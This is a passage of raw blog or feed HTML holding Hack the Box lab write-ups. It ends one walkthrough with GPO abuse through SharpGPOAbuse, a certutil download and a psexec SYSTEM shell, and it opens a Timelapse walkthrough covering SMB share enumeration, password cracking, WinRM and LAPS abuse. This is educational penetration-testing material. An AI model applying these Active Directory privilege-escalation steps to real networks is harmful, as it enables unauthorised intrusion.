url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABVklEQVR42mVRWXbCMAzkKoUWSMgKduxsZIcAbelCt/sfZDo2P10+5kmWnmY08mSZXzDPP+ClBzTjK8bzF4aHT+wfP9Gf3tEd3xBnAxaBQrTWCGMNnwiIu1WC2z+YFP0TRDEibx9RdGdk9T1SImvuoasTtsMZblRi6gjMV4IkEreu4LCwtX+ETlRQPWczwc1SWkwdxabGkr25n9l+rHuEqkWQ1Mw7bNIegawxc+VvQlXskZQHSG4p89HmZnhGgWVoxDJI1qrdC6r+jLQ6ouTWzf6ZTo5XQu8H4SpMYRCp3to2NtX2SPUGYdJaxHqAoNg6HRCyLrId/M2W9pW1PXWkJZ65JJT5HionGdXMFu3hco3jBTWj4naR6qxAIFv4osaa7zVtG/KYeWxOISo4UYZJQqs1f9eNcrhxaQf8Tc1meSURDTy+zU0N7ryU0LytxsIitXHuabvxN/Pa5cLTaltLAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="get BloodHound data" title="" src="/static/5ab850eb6e34aba1c9f11ad2c33769e8/50637/get-bloodhound-data.png" srcset="/static/5ab850eb6e34aba1c9f11ad2c33769e8/dda05/get-bloodhound-data.png 158w, /static/5ab850eb6e34aba1c9f11ad2c33769e8/679a3/get-bloodhound-data.png 315w, /static/5ab850eb6e34aba1c9f11ad2c33769e8/50637/get-bloodhound-data.png 630w, /static/5ab850eb6e34aba1c9f11ad2c33769e8/ee7ce/get-bloodhound-data.png 756w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After importing the data into BloodHound, viewing Shortest Paths to Domain Admins showed that <code class="language-text">enterprise-security</code> had GenericWrite on the SECURITY-POL-VN GPO which was linked to the VULNNET.LOCAL domain:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5f4bd2df00fe555cfbd501a0b17f748d/b49bb/bloodhound-shortest-paths-to-domain-admins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.734177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABSklEQVR42o1S7ZKCMBDjeTw/QIXSUlpKKTiA7/84cbegp3d6cz8Cw+42m4QmB2GQlg2Etai7GbK5oLQD8qpDWlkUvoNuJ0h3QVEHHFWLrHQ4VR67vI7YF+aB5CDokAl0YEDVjjhrHxdwTTQDZHuJSzLpcCQUpqflPUy4oqQ+1yPpSpzwgwvbM0M/tjK+ThqbTGFzqn71+JuVMjkrZ2FcS57lPiOlYekCummGciNZbKPySLiKYJJUNhSPR96PkGH6TMjD0aZyMTe1ZsvZFaWhvKcYRVRH80dayL2PhHdbKR0+0yDnVRJB5Ueo2pPqJVeeuc/v/rLM4SuyHOYrtJ+jkpzAve1KsP/xhx8/JUKYl9DZ8kFwZiaSsd1Py18In0mWzJYsMnqntERauj5Etnuj5i3hcq8GCDPQ3Zph+2u8xNpPsGGEdt9W/0N4A9gsTZFMiTGlAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="BloodHound Shortest Paths to Domain Admins" title="" src="/static/5f4bd2df00fe555cfbd501a0b17f748d/50637/bloodhound-shortest-paths-to-domain-admins.png" srcset="/static/5f4bd2df00fe555cfbd501a0b17f748d/dda05/bloodhound-shortest-paths-to-domain-admins.png 158w, /static/5f4bd2df00fe555cfbd501a0b17f748d/679a3/bloodhound-shortest-paths-to-domain-admins.png 315w, /static/5f4bd2df00fe555cfbd501a0b17f748d/50637/bloodhound-shortest-paths-to-domain-admins.png 630w, /static/5f4bd2df00fe555cfbd501a0b17f748d/fddb0/bloodhound-shortest-paths-to-domain-admins.png 945w, /static/5f4bd2df00fe555cfbd501a0b17f748d/f46b1/bloodhound-shortest-paths-to-domain-admins.png 1260w, /static/5f4bd2df00fe555cfbd501a0b17f748d/b49bb/bloodhound-shortest-paths-to-domain-admins.png 1495w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This meant that a tool like <a href="https://github.com/FSecureLABS/SharpGPOAbuse" target="_blank">SharpGPOAbuse</a> could be used to add <code class="language-text">enterprise-security</code> to the <code class="language-text">Administrators</code> group. So I started a python web server that contained <code class="language-text">SharpGPOAbuse.exe</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 628px; " > <a class="gatsby-resp-image-link" href="/static/c65e8a1bf3f48aeedde4aaa787322a48/d67bd/http-server-sharpgpoabuse.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA70lEQVR42m2PWXKDMBBEuUogLDYmLEYSAmEWg8Fgg4kr9z9KR4ifLP7o0tRUqec9zQg7vIUT9HCEFRRI8h5ZOSKrJ5yaB4p2ATsNSMsb0voOXozg5R1uXELfURh79iMUGikXUHFFQFt4xwp+XINkFxDRI+IXOL6A5aW/Yn9keHeTP2VbNIcMsPkXLDLDpQ3y8wN1/5R0C/JmVqTHtAOV5CspyToFsI+K14SBmBEVn/DTAYlUEdWEqnvKj71UuyGWBWvhRtwqdZZfFfl/Qllo2DFsl8GSC3PHoNsEurNdNg9cqZkHGfmq2eNq/0p3LfwGD7mimnzaFJoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="http server SharpGPOAbuse" title="" src="/static/c65e8a1bf3f48aeedde4aaa787322a48/d67bd/http-server-sharpgpoabuse.png" srcset="/static/c65e8a1bf3f48aeedde4aaa787322a48/dda05/http-server-sharpgpoabuse.png 158w, /static/c65e8a1bf3f48aeedde4aaa787322a48/679a3/http-server-sharpgpoabuse.png 315w, /static/c65e8a1bf3f48aeedde4aaa787322a48/d67bd/http-server-sharpgpoabuse.png 628w" sizes="(max-width: 628px) 100vw, 628px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded it onto the target with <code class="language-text">certutil.exe</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/93fcdeec7d23f383651fa58cd5317dde/14945/download-sharpgpoabuse.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.658227848101264%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAp0lEQVR42kWO2Q6CMBBF+ReIoCIt2IWtFcqiCBKf/P8/ubaY4MPJ3MxyMl5r3tC3GbpZIPIReTXZvEK3K0o9g4keMVFIuQHJGlzSBpS1yMSAc6JAry1S1tl5B8IMPCdS9rC2kFSDy8FKBojibpfNJkuoRkwVDkcJP+QIIrHhhz+CSG74Fo/LHmU9oVJPSCtx2dX69kLu+nrB+Phs34SnAkEoduEfufMFPT1ib31CbwAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download SharpGPOAbuse" title="" src="/static/93fcdeec7d23f383651fa58cd5317dde/50637/download-sharpgpoabuse.png" srcset="/static/93fcdeec7d23f383651fa58cd5317dde/dda05/download-sharpgpoabuse.png 158w, /static/93fcdeec7d23f383651fa58cd5317dde/679a3/download-sharpgpoabuse.png 315w, /static/93fcdeec7d23f383651fa58cd5317dde/50637/download-sharpgpoabuse.png 630w, /static/93fcdeec7d23f383651fa58cd5317dde/14945/download-sharpgpoabuse.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With <code class="language-text">SharpGPOAbuse.exe</code>, I added <code class="language-text">enterprise-security</code> as a local admin to the AD objects linked to the SECURITY-POL-VN GPO. In this case, the domain VULNNET.LOCAL:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/32ce3c5a706db5d903f56f44110ed8bd/ff233/add-enterprise-security-local-admins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABQklEQVR42j1R2ZKCMBDkU5T1wAVBroQQQIiIHJ4r//8rvZO4tQ9TPVOV6e7pWHF2hqxvEMcJopqQE/JyQEY9K3rCESFrwWSPIKnhhSWcvYB3KODHFfZRhV0gETAFh9BKRAfV/RiyUt0JR/BigCgnJCSWETJ5gRb2kwYuEa2cBPYmwnIdYrk6YPHlY7kJYe84rDTvUJ2en1IPNN3bOG5IRDY3VO3TCNWE52FG28849W8y8UIqWkSsxiEi1y7D2hOw8uOVHsx/hHdDpM4vInlAXWYjoC/Q/ZFIZT0hzVpwiiDiLcWgyLkypztuSidnHZ03GqKyviKvrpC6yKUW0YJ1+zIEWzej/CTsLcdiw7DcMtgOp5lhsQpojj8ZFrScU4Z6SRNG9Am8GM2sBbkcwEQPnhPmI31Mg32s/ssLCji+gP2d4RcGA8sy3yi3PQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="add security-enterprise to Administrators" title="" src="/static/32ce3c5a706db5d903f56f44110ed8bd/50637/add-enterprise-security-local-admins.png" srcset="/static/32ce3c5a706db5d903f56f44110ed8bd/dda05/add-enterprise-security-local-admins.png 158w, /static/32ce3c5a706db5d903f56f44110ed8bd/679a3/add-enterprise-security-local-admins.png 315w, /static/32ce3c5a706db5d903f56f44110ed8bd/50637/add-enterprise-security-local-admins.png 630w, /static/32ce3c5a706db5d903f56f44110ed8bd/ff233/add-enterprise-security-local-admins.png 746w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The default refresh cycle for Group Policy is about every 90 minutes, but an update can be forced with <code class="language-text">gpupdate /force</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 506px; " > <a class="gatsby-resp-image-link" href="/static/51989f162cbdf265135f9d01d4154646/f6694/group-policy-update.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 30.37974683544304%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAElEQVR42m2Q6XKCQBCEeRbRAHIt7MmpHNGIlVTe/2U6M2DKqsQfX802Mztst1f3dzCn6Rvd8EV8ouoWKHdBqWeo6orSzLD1B2xzg35o1y5wzYJcDjR7RSZH7AILL8k7ZOWZOCEWHeK8RRjX8AOD3Zte8QOu6oFee7/9rbK22IcOnh9sg1z5IrMPzR/sPw6RW3l+c/B5YaFHVP1C9kYUZgJrSZYMWRNqhCBLurrAkOVSc3+CpDg4koLmDtFz4fpCzkCoAdLOyMk6X5Kaz8MaA2fGPUEZ8Q84v9K+IxH9i5fTwihtEKX1RlIjTlsciShpNk25HjPSNMd1O1PO1H+18AcFkL7OHdh20gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Group Policy update" title="" src="/static/51989f162cbdf265135f9d01d4154646/f6694/group-policy-update.png" srcset="/static/51989f162cbdf265135f9d01d4154646/dda05/group-policy-update.png 158w, /static/51989f162cbdf265135f9d01d4154646/679a3/group-policy-update.png 315w, /static/51989f162cbdf265135f9d01d4154646/f6694/group-policy-update.png 506w" sizes="(max-width: 506px) 100vw, 506px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Checking group membership again showed that <code class="language-text">enterprise-security</code> was now in the <code class="language-text">Administrators</code> group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 611px; " > <a class="gatsby-resp-image-link" href="/static/31fddf469ee297db0ac4136df9253ad2/a4271/group-membership-administrators.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACIElEQVR42n2TaXLaUBCEdZQYCSFA+76gXWw2EMeJ73+UTs8jdhkK58eUpNLoU0+/Hi3MJiTFDll5QJAMiPjsxwO8qEeUjijqFxTNC7LqoHri4gAv7NkzsnfLvhEe751ogLEqoEljO/xEnG/xw4hgWOm1FilWzgb97jf66Q355oiS4Djf8X2G+VIqZxUwWLqVQ+ezVrVn1P1FKRClll3C5AvdTGCuckT8UVYd4QQtVm6tSkACvVauSv9XWt1d0I6vqnbHdzWOtS7xRLVO0FD9K9ZeDTfslA1O0GFufQXeQjXxLaZvHj+IkhEL+iDqpAQsIy6dSqky14V6f6vwFqpt2hN2+z+o6md09DLneMYiwWwe08MKAz0s6yPCVA6Ph5Lvlbf6In0IJfCMafumgAJuaMFafGKDfFg2J9h+o8a2/Vbdi9LHwIwjRx3CmDGgPylHD5OJcZmwJkzGcwl5mkcEXG2YiR3fwBSwkHzxdNVYhPs8FFEoIwtQ7gX2GadvQJ/Amh423Zn+XZRCnWokgx8lo5uSO8Lmy2v9F5gwZ3m5Vx469Mnkh6bAOJoolI0IaIPExWciAibB9j9UPwC6NNlnaAVmuxvEXDeLWzBjDpcEhnYFSw+xNFi0QSm37uvOQ/HvGpsLhukX2v4Ml6GO2Pw+nPFMj0/VHtuwhaUOKHsAvYK1VA6EeypeylWyWPGacvEzejrK/nqNUmqrHU9uPL6H/gWUc7+WlIOjpwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Group Membership Administrators" title="" src="/static/31fddf469ee297db0ac4136df9253ad2/a4271/group-membership-administrators.png" srcset="/static/31fddf469ee297db0ac4136df9253ad2/dda05/group-membership-administrators.png 158w, /static/31fddf469ee297db0ac4136df9253ad2/679a3/group-membership-administrators.png 315w, /static/31fddf469ee297db0ac4136df9253ad2/a4271/group-membership-administrators.png 611w" sizes="(max-width: 611px) 100vw, 611px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Listing the shares confirmed administrative access:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/16d7c572e7f17e51b76363e853dac5fe/f3121/admin-access-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 45.56962025316456%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB5ElEQVR42i2SyVbbQBBF9SHZEGyMNbbUk2ZLsgXYhpiQsMwm//8PNyWRRZ3TXUf93n1VCrb2hY1/Z9v8JqnPTC+/GOYb0/yD9vROd3xlmM5o1xGrmkx3PKqWLG+w0rO2JZXz3vSERUeQdJ/k5RNFeaIa36iGV2z7gqlmMjvSHm8009tqkolhO3+IifRG+a55RpdHef9Vyo0EafNTxGZcd+EgJOdpRPuRSI+EeU95uGIaMaif2LmBWIwXcyWVuSNxcWCvOqJcyNOK4L7+y922IJTLeBKS6YIpx/VRakauH3+YLp90QnZoKua+FoGDRG95HWsujbyNLaXWHHxBYNsbaeLZRLXgzxT+RKQaMSh5TEqq/4RF/YzVHqMM3x4c29DSO81TbXiIPU5bGmsIivJMkXm2IpjZo9REtMRIG3aRW2ekvPTdRKY8aebWUsrROovOHfehJ0wcUeoI4uqTzb4Sl1aWccEJzRI1MRNhVtOfbrKoK7a70nrPVJpVzBSO50avInd7TyHCOrcEZfMmMSRKXpH7Weq0DjrKB6Gs8Z38MhJXLYsznqMIboToIXYMcq6NXQm9XuYogt4OVIVcxDFUvcyvZ7fETRq2cUWiRbzo143HqSeTuN+FaBfJWX3FXQgTIY1Txz/XuCjQe51G0AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="admin access shares" title="" src="/static/16d7c572e7f17e51b76363e853dac5fe/50637/admin-access-shares.png" srcset="/static/16d7c572e7f17e51b76363e853dac5fe/dda05/admin-access-shares.png 158w, /static/16d7c572e7f17e51b76363e853dac5fe/679a3/admin-access-shares.png 315w, /static/16d7c572e7f17e51b76363e853dac5fe/50637/admin-access-shares.png 630w, /static/16d7c572e7f17e51b76363e853dac5fe/f3121/admin-access-shares.png 735w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using <code class="language-text">psexec.py</code>, I obtained a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ae873e24ad3c9b7b27f2795f0991589c/39600/system-shell-1.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACEElEQVR42o2U65KaQBCFeZRNFi+ICgvMDLfhJirobqm5VKWSvP9rnHQP68bslpofp7qLGr45fQFrmn3DJP+BWfoCvT6iO/w02h1/YXf6jab/jhXJDUvYiwTjZYoJi/LJctD4HBcxrCDvMY8qLKIavlqRWjzFa3iyQZRuKW8RUnSDwjzzVIOlqEkVnW1M9OSQu4GGVZCrMNuaQ/wCO/HkyuSOr+nWBJ8dafQ4U0bn3J5xFLBd+SaraJ5RrU+oNieUBOfIJer2aICOn9PB+A12KZt1ATPArOhQNHukFHXdIy97KN0b11xykKzvQ2cXwJycVNuvKDZfkFV7ZGWHOGshCJjWLwiTDabedeB7qCX1DqrYIS73pvlJ9QxJwFDViLKNee5TP3lg3ILLXv4LlUYWA1TRQ+SdKZWnzI4exiEeJhE+TSVJvILkVZdnqBUmrenTWezCDUrMw2GVzpG3gPfvmsNBBIyoNMHlxQ0CUVKpFUQ69NAl2JQG4pDjYYXSmw4NsFydoGi5Uyo9IwlynGrqXbbGmJrMZf/dQ3kHqGD5ssUiqOA+0UKL4UthLcMCflTCp1IX5PTRUXdhBphodtXRemypzJ7AhZksl2k7EUbzGKMbK/MBmFcHWpMdqYduDvAidlQTJCGgMIOSNH0ezn8B7SndPlEYzWJE5DKgH4Pj6eFnIRpy3Zk99Sgfz/m7vg38A8M14YdEBXzhAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/ae873e24ad3c9b7b27f2795f0991589c/50637/system-shell-1.png" srcset="/static/ae873e24ad3c9b7b27f2795f0991589c/dda05/system-shell-1.png 158w, /static/ae873e24ad3c9b7b27f2795f0991589c/679a3/system-shell-1.png 315w, /static/ae873e24ad3c9b7b27f2795f0991589c/50637/system-shell-1.png 630w, /static/ae873e24ad3c9b7b27f2795f0991589c/39600/system-shell-1.png 700w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-timelapse/https://mgarrity.com/hack-the-box-timelapse/Fri, 24 Nov 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e035cea56d863c17d94cbe2ae5b25458/3b67f/timelapse.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVR42mMQkdX+jxPLaf8XltH+zy+uA6ZF5fCohWIGXBIgzQISWv/F5DT+q+io/5eQ1wDyIZaQbCDIMEFJ7f9qxjr/vcp8/jv05P53K/YB80Hi+FyK1UBhGZ3/Ugqa/+1yPf5PWd33/9jpHf9LpzT8d8xyBLpU678wSS4EuQ7oNUUDnf8+hV7/L5zY+//Bl///92xY/N8v1+m/vK7OfyEp3K7E4ULt/xKKOv/d08z+L13U/P/uxVP/504oAPJN/4sr6PwXkSEnDIERomio998vw/R/Wo7pf6804/9KRnrkhSHMUCFJLXAQSGrr/BeVh1hCViwjGwpmS6Px8RgIAOBRC9yD/tY7AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Timelapse" title="" src="/static/e035cea56d863c17d94cbe2ae5b25458/50637/timelapse.png" srcset="/static/e035cea56d863c17d94cbe2ae5b25458/dda05/timelapse.png 158w, /static/e035cea56d863c17d94cbe2ae5b25458/679a3/timelapse.png 315w, /static/e035cea56d863c17d94cbe2ae5b25458/50637/timelapse.png 630w, /static/e035cea56d863c17d94cbe2ae5b25458/fddb0/timelapse.png 945w, /static/e035cea56d863c17d94cbe2ae5b25458/3b67f/timelapse.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Timelapse is a Windows machine running Active Directory with an open SMB share that contains a password-protected ZIP archive. The password can be cracked, revealing another password-protected file—this time a PFX, which can also be cracked. With access to the PFX, the certificate and private key can be extracted and used to make a connection via WinRM. After enumerating the system, credentials for another user can be found within <code class="language-text">ConsoleHost_history.txt</code> and then used to move laterally. This user is a member of the LAPS_Readers group which allows access to local admin passwords on the machine, resulting in a shell as <code class="language-text">Administrator</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/52f133cdceee0f7035ae92d0f024d1c5/21910/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 108.22784810126582%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAADjUlEQVR42nWUV3rbQAyEeZREhUXsbdk7KVtykZ045f4XQQagnCjtAd+SovbfwWBITU8WMss3MrIXMpOR6uVC1fRM08NXOj5+lzXIJ3KijmyU4VWkuwXt7Jy2h+yv0qrplerphdr5QkX/SKo5Ubu8UjU+oQAfn6kcHuU+LBZyk568dBQwA1ZwfgMEJAeE13Z+kY01KlAjRQDwZi8ZyE8H2lqKPuiR1EcjXsvkSmhjpiuwGZ7JDhrK6hPADzTfv5ETtuSivfn0hRooVNU9eXFPll//LBMKTbckC+2bTia1s1LS6v6JUm6FIWFHUTbjgFagPjwN04nS8p5CNUH1RJZXSplOLrCDt0ItF20bIWntdCFV3onCFEpY8cFvKECb3fxKLXwc797w+xOV3QMlxVEsMNwK/6sFrh8UGTYUonVNfBMfz9JyD0iBa1bNm/k6gI+8mZXbUO7AIgYd0LaD3w5eTYegI92pSBuOn2Rz2Z5F6XL+QiUgplOK0rX9Tnzme4uVAWDg+cbIMJgMA8FqrqvWITJV+0AV2snQ8oT2VHFHfjxQ3V9EOR/aDhc8P1EGP8sWkUJ50SiQrQX/rAIeYigpNrecNUB7wHN4udx/pRng4cjeXfDskYr6jEPQutdc22xpb5W0NfOfwA1ipOX4YykKkUMMhD1j1TXuWQX/xi1udOTMUFiVXPP6C3YtU5EWqZk6TDJGXPyopwjRcOCVgfTrVobpFZhiIbAd/Npj4x6gHcPe6waqsScNZzE/kgWjXbSz1RNsUOIj5zCIOY/IJw76uE/xDL4Z2T+h2nj8DCC3y9A76qHW8VtR28+fJEbz6RuNGEzdP0v4+SAbXu7+VGoyEB+CEVnkNa8wUVzrOCnAJj5sAPB4xlcH1wVyynHi6Bh2iVctE7W3YC1DeFP4xxXDzyRb5HQPSjg+fB9fK8CryAp5ymEyycTF2xuopvKFGmSwRAYrKGAvk+woUClstvARcMMeoE7AkVrE4xX0e2kBvGoQkQTTTdSqkgfDPnJ5eM6vHU+by0Sr0u4/YFdgRy2mXPE7i3YSaXumIBqgrBY4T5/fgh3a217rv0Ab7bB/OfyKEZEYHwKbTUf2NvsEEUqldgK5rf8AC3iXQlWID6gPtbxGmLAHZTwEziCrdeEf33Oc/GQQ5WyHh2cBBsR5Nflrw0AFhQ5eL4awly484/bfN63AVqAehsOR+l3tL9U/APskzTIt4HR4AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/52f133cdceee0f7035ae92d0f024d1c5/50637/nmap-scan.png" srcset="/static/52f133cdceee0f7035ae92d0f024d1c5/dda05/nmap-scan.png 158w, /static/52f133cdceee0f7035ae92d0f024d1c5/679a3/nmap-scan.png 315w, /static/52f133cdceee0f7035ae92d0f024d1c5/50637/nmap-scan.png 630w, /static/52f133cdceee0f7035ae92d0f024d1c5/21910/nmap-scan.png 716w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389 (LDAP)</li> <li>636 (LDAPS)</li> <li>5986 (WinRM over SSL)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: timelapse.htb</li> <li>hostname: DC01</li> </ul> <p>SMB allowed anonymous logon, so I listed the shares with <code class="language-text">crackmapexec</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3c0331560115b9c83c010e2e0a288d77/04964/list-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABT0lEQVR42k2Q2XKbQBBF+ZCkYjkItAAamAWGRQIJY+TYiirx///KSSO/5OFWd810nT7VQVh9ErobuR8ZpjvD61+68Y7vfxGrhjCpiPIj69QT7ivWkkj6aHmXxNL/nyDVJ1z3Rjvc8KcrRTViuyv18MFOdfzcOUIzoo/vlO2Maa9kbmQjf/uiIylOHGxPJpxUHwnCXYmpX2nPN8puJrMDhZ9oZME68aw2DlW2VN1IXk349oVT3aAyTbS3aKVlxj4Sbi3BU2TQC3D4jRODRDapcqTu31mW/diUDKWmKjTfIss2kfncsMscB2X50xdcvCZJHc9bR7CKLbaeOV7uYvgm6r2YvNCcP+RmX8CxNkyS5YZKLSDH91jqwfIpwLkp8FrLMjF8FqCyZ1wzk7vL426p6cV6egCfBNhYy1AZVtuSvZgl2ZdNnDisNigBV1KzzPIPcbjCn6P8dEoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list shares" title="" src="/static/3c0331560115b9c83c010e2e0a288d77/50637/list-shares.png" srcset="/static/3c0331560115b9c83c010e2e0a288d77/dda05/list-shares.png 158w, /static/3c0331560115b9c83c010e2e0a288d77/679a3/list-shares.png 315w, /static/3c0331560115b9c83c010e2e0a288d77/50637/list-shares.png 630w, /static/3c0331560115b9c83c010e2e0a288d77/04964/list-shares.png 851w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With read access on <code class="language-text">Shares</code>, I used <code class="language-text">smbclient</code> to view the share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7fb0a85a43076052eecd3865e8492d0f/0c7b9/smbclient-shares.png" style="display: block" 